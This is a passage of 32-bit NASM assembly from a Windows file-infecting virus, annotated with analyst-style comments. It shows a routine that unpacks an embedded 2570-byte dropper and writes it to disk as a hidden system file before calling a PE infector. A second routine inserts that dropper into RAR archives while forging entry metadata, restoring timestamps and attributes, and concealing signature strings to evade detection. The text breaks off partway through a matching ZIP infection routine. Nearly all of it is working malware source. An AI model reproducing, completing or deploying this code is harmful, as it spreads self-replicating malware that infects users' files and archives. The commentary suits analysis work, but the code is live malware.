ret
;-----------------------------------------------------------------------
; dropTheVirus -- uncompress the dropper and infect it
; Writes the embedded, RLE-packed dropper to disk and then hands the
; resulting path to infectpe (defined elsewhere in the file).
; Syntax: NASM, 32-bit x86. Every data label is addressed as [label+ebp];
;         ebp appears to hold a base/relocation delta -- confirm in the
;         entry code, which is outside this excerpt.
; In:    ebp = data base; dropName must already contain the output path
; Out:   no meaningful return value; eax/ecx/edx/esi/edi and flags clobbered
; Stack: all imported callees are stdcall and pop their own arguments
; What an analyst can observe from this routine: a newly created file at
; dropName, 2570 bytes long, with attributes READONLY|HIDDEN|SYSTEM (7),
; followed by a call into infectpe on that same path.
;
; Step 1: expand drop -> dropExp. Encoding as implemented by the two loop
; bodies below:
;   control byte with bit 7 clear -> (byte & 127) literal bytes follow
;   control byte with bit 7 set   -> the next byte is repeated (byte & 127) times
; edx counts the bytes still owed; decoding stops when it reaches zero.
;-----------------------------------------------------------------------
dropTheVirus:
xor ecx,ecx ; expand the RLEed -- ecx cleared so "mov cl" below yields a clean count
mov edx,2570 ; dropper -- number of output bytes still to produce
lea esi,[drop+ebp] ; esi = packed source
lea edi,[dropExp+ebp] ; edi = unpacked destination
expandLoop:
test byte [esi],128 ; bit 7 of the control byte selects literal vs. repeat
jnz expRep
mov cl,byte [esi] ; literal run: cl = count
and cl,127
sub edx,ecx ; bytes still owed after this run
inc esi ; step over the control byte
rep movsb ; copy ecx literal bytes
or edx,edx
jnz expandLoop
jmp endExpand
expRep:
mov cl,byte [esi] ; repeat run: cl = count (bit 7 masked off below)
inc esi
lodsb ; al = byte to repeat; esi now past it
and cl,127
sub edx,ecx
rep stosb ; emit al ecx times
or edx,edx
jnz expandLoop
endExpand:
; Step 2: CreateFileA(dropName, GENERIC_WRITE, share 0, no security,
;         CREATE_NEW, READONLY|HIDDEN|SYSTEM, no template).
; Arguments are pushed right-to-left (stdcall).
xor eax,eax
push eax ; hTemplateFile = NULL
push dword 00000007h ; system, read only and hidden
push dword 00000001h ; CREATE_NEW: fails if the file already exists
push eax ; lpSecurityAttributes = NULL
push eax ; dwShareMode = 0
push dword 40000000h ; GENERIC_WRITE
lea esi,[dropName+ebp] ; that must be initialized
push esi ; before use it!
call dword [_CreateFileA+ebp]
inc eax ; INVALID_HANDLE_VALUE (-1) becomes 0
jz skipDrop
dec eax
push eax ; keep the handle for the CloseHandle call below
; Step 3: WriteFile(h, dropExp, 2570, &dummy, NULL).
; dummy is a scratch dword that other routines in the file also reuse.
push dword 0 ; lpOverlapped = NULL
lea esi,[dummy+ebp]
push esi ; lpNumberOfBytesWritten
push dword 2570 ; nNumberOfBytesToWrite
lea esi,[dropExp+ebp]
push esi ; lpBuffer
push eax ; hFile
call dword [_WriteFile+ebp]
call dword [_CloseHandle+ebp] ; consumes the handle pushed above
; Step 4: infectpe is invoked with esi = dropper path; its behaviour is
; defined outside this excerpt.
lea esi,[dropName+ebp]
call infectpe
skipDrop:
ret
;-----------------------------------------------------------------------
; infectRAR -- adds the dropper to a RAR archive pointed by esi
; Inserts the dropper as a new first entry (directly after the main
; archive header) of the archive whose path esi points to.
; Syntax: NASM, 32-bit x86; data is addressed as [label+ebp] (ebp appears
;         to be a base/relocation delta -- confirm in code outside this excerpt).
; In:    esi = NUL-terminated path of the archive (ANSI APIs are used)
;        dropName = path of the dropper file written by dropTheVirus
;        RARHeader..FinRARHeader = template file-header block carried in
;        the data area; its fields RARFileTime/RARFileDate/RAROs/
;        RARCompressed/RAROriginal/RARCrc32/RARHeaderCRC are patched below
; Out:   no meaningful return value; eax/ebx/ecx/edx/esi/edi and flags clobbered
; State: fileAttrib, fHnd, fileSize, fileTime2 (plus the two 8-byte slots
;        just before it), fhmap, mapMem and wideBuffer[0..2] are scratch
;        dwords in the data area
; Observable side effects (useful when looking for affected archives):
;  - the archive grows by (FinRARHeader-RARHeader) + dropper size
;  - a new file entry appears immediately after the main archive header
;  - the original attributes and all three FILETIMEs are written back at
;    the end, so mtime/attributes alone do not reveal the change
;  - the marker and name signatures are compared against complemented
;    constants (~"Rar!", ~"READ", ~"ME.E"), so those strings do not occur
;    literally in the code
; Error handling: each failure jumps to one of the infectionError* labels,
; which unwind (unmap, close, restore time/attributes) as far as the
; corresponding setup step had progressed.
;-----------------------------------------------------------------------
infectRAR:
push esi
push esi
call dword [_GetFileAttributesA+ebp]
pop esi ; esi preserved across the call
inc eax ; INVALID_FILE_ATTRIBUTES (-1) becomes 0
jz near infectionErrorRAR
dec eax
mov dword [fileAttrib+ebp],eax ; remembered so they can be restored at the end
push esi
push dword 80h ; FILE_ATTRIBUTE_NORMAL: drops read-only/hidden/system for the write
push esi
call dword [_SetFileAttributesA+ebp]
pop esi
or eax,eax
jz near infectionErrorRAR
push esi ; archive path, popped again at infectionErrorAttribRAR
; CreateFileA(path, GENERIC_READ|GENERIC_WRITE, share 0, NULL,
;             OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)
xor eax,eax
push eax
push dword 80h
push dword 3 ; OPEN_EXISTING
push eax
push eax
push dword (80000000h | 40000000h) ; GENERIC_READ | GENERIC_WRITE
push esi
call dword [_CreateFileA+ebp]
inc eax
jz near infectionErrorAttribRAR
dec eax
mov [fHnd+ebp],eax
push dword 0 ; lpFileSizeHigh = NULL: only the low dword of the size is used
push eax
call dword [_GetFileSize+ebp]
inc eax ; INVALID_FILE_SIZE (-1) becomes 0
jz near infectionErrorCloseRAR
dec eax
mov [fileSize+ebp],eax
; GetFileTime(fHnd, &creation, &lastAccess, &lastWrite): the three
; FILETIMEs are stored at fileTime2-16, fileTime2-8 and fileTime2.
lea eax,[fileTime2+ebp]
push eax ; lpLastWriteTime
add eax,-8
push eax ; lpLastAccessTime
add eax,-8
push eax ; lpCreationTime
push dword [fHnd+ebp]
call dword [_GetFileTime+ebp]
or eax,eax
jz near infectionErrorCloseRAR
; CreateFileMappingA(fHnd, NULL, PAGE_READWRITE, 0, 0, NULL): whole file
xor eax,eax
push eax
push eax
push eax
push dword 4 ; PAGE_READWRITE
push eax
push dword [fHnd+ebp]
call dword [_CreateFileMappingA+ebp]
or eax,eax
jz near infectionErrorCloseRAR
mov dword [fhmap+ebp],eax
; MapViewOfFile(fhmap, FILE_MAP_READ|FILE_MAP_WRITE, 0, 0, 0): whole file
xor eax,eax
push eax
push eax
push eax
push dword 6 ; FILE_MAP_READ | FILE_MAP_WRITE
push dword [fhmap+ebp]
call dword [_MapViewOfFile+ebp]
or eax,eax
jz near infectionErrorCloseMapRAR
mov [mapMem+ebp],eax
; don't rely too much on next part XD
; using RAR32 for tests
; Format validation is minimal: only the 4-byte marker and the block-type
; byte of the first block after the main header are checked.
mov edx,[eax]
not edx
cmp edx,~"Rar!" ; a RAR archive? (signature kept complemented in the code)
jne near infectionErrorCloseMapRAR
add eax,14h ; skip main header -- eax -> first block after marker + main header
cmp byte [eax+2],74h ; a RAR header? (block type byte at offset 2)
jne near infectionErrorCloseMapRAR
; Re-infection check: the first entry's name field is compared 4 bytes at
; a time against "READ" and "ME.E" (again via complemented constants).
mov edx,[eax+RARName-RARHeader] ; check if already
not edx ; infected
cmp edx,~"READ"
jne RARNotFound
mov edx,[eax+RARName-RARHeader+4]
not edx
cmp edx,~"ME.E"
je near infectionErrorCloseMapRAR
RARNotFound:
; The RAR file seems ok and it's not infected
; Time, date and host-OS byte are copied from the existing first entry
; into the template so the inserted entry matches its neighbours.
mov dx,[eax+RARFileTime-RARHeader] ; less suspicious
mov [RARFileTime+ebp],dx
mov dx,[eax+RARFileDate-RARHeader]
mov [RARFileDate+ebp],dx
mov dl,[eax+RAROs-RARHeader] ; same os
mov [RAROs+ebp],dl
; now load our droper
; CreateFileA(dropName, GENERIC_READ, 0, NULL, OPEN_EXISTING, 7, NULL)
xor eax,eax
push eax
push dword 00000007h ; READONLY|HIDDEN|SYSTEM, the attributes it was created with
push dword 00000003h ; OPEN_EXISTING
push eax
push eax
push dword 80000000h ; GENERIC_READ
lea esi,[dropName+ebp] ; our dropper
push esi
call dword [_CreateFileA+ebp]
inc eax
jz near infectionErrorCloseMapRAR
dec eax
push eax ; dropper handle, recovered into ebx after GetFileSize
push dword 0
push eax
call dword [_GetFileSize+ebp]
pop ebx ; ebx = dropper file handle
inc eax
jz near infectionErrorCloseMapRAR
dec eax ; eax = dropper size
add [fileSize+ebp],eax ; new size
add dword [fileSize+ebp],FinRARHeader-RARHeader
mov [RARCompressed+ebp],eax ; update RAR header
mov [RAROriginal+ebp],eax ; packed == unpacked size; consistent with a stored entry (method byte not visible here)
; Map the dropper read-only: CreateFileMappingA(ebx, NULL, PAGE_READONLY,
; 0, 0, NULL), then MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0).
push ebx
xor eax,eax
push eax
push eax
push eax
push dword 2 ; PAGE_READONLY
push eax
push ebx
call dword [_CreateFileMappingA+ebp]
pop ebx
or eax,eax
jz near infectionErrorCloseMapRAR
push ebx
push eax
mov ebx,eax
xor eax,eax
push eax
push eax
push eax
push dword 4 ; FILE_MAP_READ
push ebx
call dword [_MapViewOfFile+ebp]
pop edx ; edx = dropper mapping handle
pop ebx ; ebx = dropper file handle
or eax,eax
jz near infectionErrorCloseMapRAR
push ebx ; file hnd
push edx ; file mapping
push eax ; map view of file
; CRC32 is defined elsewhere; from its use here it appears to take
; esi = buffer, edi = length and return the checksum in eax -- confirm.
mov esi,eax
mov edi,[RAROriginal+ebp]
call CRC32
mov [RARCrc32+ebp],eax ; data CRC of the new entry
lea esi,[RARHeader+2+ebp] ; header CRC covers everything after the 2-byte CRC field
mov edi,FinRARHeader-RARHeader-2
call CRC32
mov [RARHeaderCRC+ebp],ax ; only the low 16 bits are stored
; The old-size view/mapping is released before the file is remapped at
; the enlarged size.
push dword [mapMem+ebp]
call dword [_UnmapViewOfFile+ebp]
push dword [fhmap+ebp]
call dword [_CloseHandle+ebp]
pop dword [wideBuffer+ebp] ; view of file
pop dword [wideBuffer+4+ebp]; file mapping
pop dword [wideBuffer+8+ebp]; file handle
; CreateFileMappingA(fHnd, NULL, PAGE_READWRITE, 0, fileSize, NULL):
; the new maximum size extends the archive to fileSize bytes.
xor eax,eax
push eax
push dword [fileSize+ebp] ; dwMaximumSizeLow = new total size
push eax
push dword 4
push eax
push dword [fHnd+ebp]
call dword [_CreateFileMappingA+ebp]
or eax,eax
jz near infectionErrorCloseRAR
mov [fhmap+ebp],eax
xor eax,eax
push dword [fileSize+ebp] ; dwNumberOfBytesToMap
push eax
push eax
push dword 6
push dword [fhmap+ebp]
call dword [_MapViewOfFile+ebp]
or eax,eax
jz near infectionErrorCloseMapRAR
mov [mapMem+ebp],eax
; Shift everything after the main header towards the end of the file by
; (FinRARHeader-RARHeader) + dropper size. The copy runs backwards one
; byte at a time because source and destination overlap.
mov edi,eax
add edi,[fileSize+ebp] ; end of file
mov esi,eax
add esi,14h ; begin of data
add esi,FinRARHeader-RARHeader ; plus added size
add esi,[RAROriginal+ebp]
mov ecx,edi ; size of data to move
sub ecx,esi
mov esi,edi
sub esi,FinRARHeader-RARHeader
sub esi,[RAROriginal+ebp]
dec esi ; esi = last byte of the old data
dec edi ; edi = last byte of the new file
moveLoopRAR: ; move the data
lodsb ; lodsb/stosb advance by +1; the following sub 2 makes each step -1
sub esi,2
stosb
sub edi,2
dec ecx
jnz moveLoopRAR
; Fill the gap: first the patched header template, then the dropper bytes.
mov edi,[mapMem+ebp] ; insert our data
add edi,14h
lea esi,[RARHeader+ebp]
mov ecx,FinRARHeader-RARHeader
rep movsb
mov esi,[wideBuffer+ebp] ; dropper view
mov ecx,[RAROriginal+ebp]
rep movsb
; Release the dropper's view, mapping and file handle (kept in wideBuffer).
push dword [wideBuffer+ebp]
call dword [_UnmapViewOfFile+ebp]
push dword [wideBuffer+4+ebp]
call dword [_CloseHandle+ebp]
push dword [wideBuffer+8+ebp]
call dword [_CloseHandle+ebp] ; dropper released
; The success path falls through into the unwind chain below.
infectionErrorCloseUnmapRAR:
push dword [mapMem+ebp]
call dword [_UnmapViewOfFile+ebp]
infectionErrorCloseMapRAR:
push dword [fhmap+ebp]
call dword [_CloseHandle+ebp]
; SetFileTime(fHnd, &creation, &lastAccess, &lastWrite): the timestamps
; captured at the start are written back, so the file's mtime is unchanged.
lea eax,[fileTime2+ebp]
push eax
add eax,-8
push eax
add eax,-8
push eax
push dword [fHnd+ebp]
call dword [_SetFileTime+ebp]
infectionErrorCloseRAR:
push dword [fHnd+ebp]
call dword [_CloseHandle+ebp]
infectionErrorAttribRAR:
pop esi ; archive path saved near the top
push dword [fileAttrib+ebp]
push esi
call dword [_SetFileAttributesA+ebp] ; restore the original attributes
infectionErrorRAR:
ret
; adds the dropper to a ZIP archive pointed by esi
infectZIP:
push esi
push esi
call dword [_GetFileAttributesA+ebp]
pop esi
inc eax
jz near infectionErrorZIP
dec eax
mov dword [fileAttrib+ebp],eax
push esi
push dword 80h
push esi
call dword [_SetFileAttributesA+ebp]
pop esi
or eax,eax
jz near infectionErrorZIP
push esi
xor eax,eax
push eax
push dword 80h
push dword 3
push eax
push eax
push dword (80000000h | 40000000h)
push esi
call dword [_CreateFileA+ebp]
inc eax
jz near infectionErrorAttribZIP
dec eax
mov [fHnd+ebp],eax
push dword 0
push eax
call dword [_GetFileSize+ebp]
inc eax
jz near infectionErrorCloseZIP
dec eax
mov [fileSize+ebp],eax
mov [dummy+ebp],eax ; required later
lea eax,[fileTime2+ebp]
push eax
add eax,-8
push eax
add eax,-8
push eax
push dword [fHnd+ebp]
call dword [_GetFileTime+ebp]
or eax,eax
jz near infectionErrorCloseZIP